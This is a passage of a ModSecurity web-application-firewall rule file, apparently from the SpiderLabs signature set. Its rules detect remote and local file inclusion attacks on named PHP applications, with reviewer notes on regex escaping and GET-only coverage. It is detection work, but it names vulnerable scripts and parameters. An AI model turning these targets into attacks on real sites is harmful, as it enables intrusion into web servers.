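#   - A selector of the form &TX:'/RFI.*ARGS:<name>/' counts the TX variables
#     whose key matches that regular expression. Presumably those keys are
#     written by the generic RFI rules of the rule set, which are not shown
#     here - confirm that they run before these signatures.
#   - NOTE(review): a chain that includes REQUEST_LINE "@contains GET " only
#     completes when the request line contains that string, so the named
#     parameter is presumably not scored when it arrives with another
#     method - confirm that this is intended.
#

# (2009311) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /ST_countries.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009311,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009312) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /ST_platforms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009312,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009313) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /ST_platforms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009313,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# The three Webradev Download Protect signatures (2010092-2010094) below
# select on a regular expression, so the brackets of the array-style parameter
# name are escaped. Unescaped, [RootPath] is read as a character class and the
# selector cannot match a key that ends in ARGS:GLOBALS[RootPath], which
# leaves the signatures unable to fire for the parameter they name.

# (2010092) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Webradev Download Protect EmailTemplates.class.php Remote File Inclusion
SecRule REQUEST_LINE "@contains /Framework/EmailTemplates.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010092,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Webradev Download Protect EmailTemplates.class.php Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[RootPath\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Webradev Download Protect EmailTemplates.class.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010093) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Webradev Download Protect PDPEmailReplaceConstants.class.php Remote File Inclusion
SecRule REQUEST_LINE "@contains /Customers/PDPEmailReplaceConstants.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010093,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Webradev Download Protect PDPEmailReplaceConstants.class.php Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[RootPath\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Webradev Download Protect PDPEmailReplaceConstants.class.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010094) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Webradev Download Protect ResellersManager.class.php Remote File Inclusion
SecRule REQUEST_LINE "@contains /Admin/ResellersManager.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010094,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Webradev Download Protect ResellersManager.class.php Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[RootPath\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Webradev Download Protect ResellersManager.class.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009690) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMoney html.php page Remote File Inclusion
SecRule REQUEST_LINE "@contains /html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009690,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WebMoney html.php page Remote File Inclusion',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/3awebmoney-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMoney html.php page Remote File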
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009691) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMoney html2.php page Remote File Inclusion SecRule REQUEST_LINE "@contains /html2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009691,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WebMoney html2.php page Remote File Inclusion',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/3awebmoney-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMoney html2.php page Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Werner Hilversum FAQ Manager header.php config_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008935,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Werner Hilversum FAQ Manager header.php config_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32472'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Werner Hilversum FAQ Manager header.php config_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003696) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wikivi5 Remote Inclusion Attempt -- show.php sous_rep SecRule REQUEST_LINE "@contains /handlers/page/show.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003696,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wikivi5 Remote Inclusion Attempt -- show.php sous_rep',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3863'" SecRule &TX:'/RFI.*ARGS:sous_rep/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wikivi5 Remote Inclusion Attempt -- show.php sous_rep',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003685) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH SecRule REQUEST_LINE "@contains /js/wptable-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003685,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3824'" SecRule &TX:'/RFI.*ARGS:wpPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH SecRule REQUEST_LINE "@contains /wordtube-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003686,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3825'" SecRule &TX:'/RFI.*ARGS:wpPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- 
wordtube-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt SecRule REQUEST_LINE "@contains /js/wptable-tinymce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010473,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:ABSPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009925) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/function_core.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009925,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:web_root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local 
File Inclusion SecRule REQUEST_LINE "@contains /includes/function_core.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009926,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009927) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /templates/layout_lyrics.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009927,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:web_root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion SecRule REQUEST_LINE "@contains /templates/layout_lyrics.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009928,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS 
x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /mini.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009194,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31460'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:help_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009870) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS XRMS CRM workflow-activities.php include_directory Remote File Inclusion SecRule REQUEST_LINE "@contains /activities/workflow-activities.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009870,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS XRMS CRM workflow-activities.php include_directory Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3399'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS XRMS CRM workflow-activities.php include_directory Remote File 
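Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003517) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iPhotoAlbum header.php remote file include
# Chain: the request line names /header.php AND a TX marker whose name matches
# /RFI.*ARGS:set_menu/ exists (presumably left by a generic RFI rule; not visible here).
SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003517,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS iPhotoAlbum header.php remote file include',tag:'web-application-attack',tag:'bugtraq,23189'"
    SecRule &TX:'/RFI.*ARGS:set_menu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iPhotoAlbum header.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009190) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Remote File Inclusion
# The TX selector is a regular expression, so a bare "[path_to_root]" is a character
# class (one character out of p,a,t,h,_,o,r) and cannot match the literal parameter
# name "context[path_to_root]" in a marker named ...RFI-ARGS:context[path_to_root].
# The brackets are written as the single-character classes [[] and []] so they match
# literally without depending on backslash escapes inside the quoted selector.
# NOTE(review): the chain only matches request lines containing "GET "; confirm
# whether the same parameter arriving by another method should also be covered.
SecRule REQUEST_LINE "@contains /update_trailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009190,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:context[[]path_to_root[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /update_trailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009191,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS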
YACS update_trailer.php context Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:context[path_to_root] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011098) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YaPig last_gallery.php YAPIG_PATH Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /last_gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011098,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS YaPig last_gallery.php YAPIG_PATH Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:YAPIG_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YaPig last_gallery.php YAPIG_PATH Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003739) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Yaap Remote Inclusion Attempt -- common.php root_path SecRule REQUEST_LINE "@contains /includes/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003739,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Yaap Remote Inclusion Attempt -- common.php root_path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3908'" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Yaap Remote Inclusion Attempt -- common.php 
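root_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009316) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /class_yapbbcooker.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009316,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30686'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:cfgIncludeDirectory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009393) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion
# NOTE(review): in this and the other "../" rules below, the t: transformations are
# listed only on the chain starter; confirm they also apply to the chained ARGS test,
# otherwise encoded or backslash traversal sequences reach "@contains ../" unnormalised.
SecRule REQUEST_LINE "@contains /cuenta/cuerpo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009393,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30345'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:base_archivo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YouTube Blog cuerpo.php base_archivo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /locales.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009329,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33965'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:srclang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ZABBIX locales.php srclang Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /artmedic_print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009661,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:date "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS artmedic weblog artmedic_print.php date Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# Rules 2010771-2010777 (asaher pro): the TX selector is a regular expression, so a
# bare "[templates_folder]" is a one-character class and cannot match the literal
# parameter name "row_y5_site_configuration[templates_folder]" in a marker named
# ...RFI-ARGS:row_y5_site_configuration[templates_folder]. The brackets are written
# as the single-character classes [[] and []] so they match literally without
# depending on backslash escapes inside the quoted selector.
# NOTE(review): every chain here requires "GET " in the request line; confirm whether
# the same parameter arriving by another method should also be covered.

# (2010771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro view_messages.php row_y5_site_configuration Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /view_messages.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010771,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro view_messages.php row_y5_site_configuration Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:row_y5_site_configuration[[]templates_folder[]]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS asaher pro view_messages.php row_y5_site_configuration Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010772) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS asaher pro view_blog_comments.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /view_blog_comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010772,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS asaher pro view_blog_comments.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/asaherpro-rfi.txt'"
    SecRule REQUEST_LINE "@contains GET " "chain"
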